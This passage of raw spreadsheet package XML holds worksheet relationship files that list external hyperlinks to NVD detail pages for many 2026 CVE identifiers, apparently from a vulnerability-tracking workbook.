/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81872" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95375" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100238" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100243" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100245" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102329" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103045" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103046" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103047" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103049" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103050" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103051" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71972" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102274" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79534" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102938" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102845" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102874" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102908" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102909" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-31027" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100822" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100823" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93332" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95287" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95290" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95352" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95370" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101917" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102265" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102277" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102879" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103053" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103057" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-35189" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42772" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79417" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81869" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102269" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95292" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95300" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95358" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102312" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71974" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95340" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95342" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95361" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-35191" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102279" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97711" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102842" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102847" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102877" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102771" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102844" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102912" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102621" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102601" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102820" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102821" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102822" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102823" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102824" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102825" TargetMode="External" Id="rId125" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet6.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76504" TargetMode="External" Id="rId1" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet7.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76504" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102427" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55107" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76570" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96349" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100512" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102115" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18782" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55494" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82307" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88920" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96350" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97248" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97274" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102149" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102489" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102490" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14157" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55181" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93903" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102147" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102455" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102458" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103395" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103470" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103475" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74864" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76142" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82824" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82825" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82827" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82829" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96822" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101276" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101283" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102508" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102992" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103547" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19445" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74865" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102095" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102102" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102103" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102104" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102105" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102106" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62308" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75969" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77185" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87830" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89238" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92966" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94052" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94053" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97196" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55176" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94389" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100277" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13313" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100253" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100254" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101880" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101882" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102120" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102125" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102377" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103474" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18783" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80275" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94076" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94121" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94678" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94683" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95531" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96831" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96837" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96838" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97291" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102092" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102100" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102509" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102510" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102993" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102994" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102995" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102996" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102997" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102998" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102999" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103000" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103235" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103270" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103471" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-10764" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47097" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55094" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55224" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76992" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82826" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82828" TargetMode="External" Id="rId100" /><Relationship 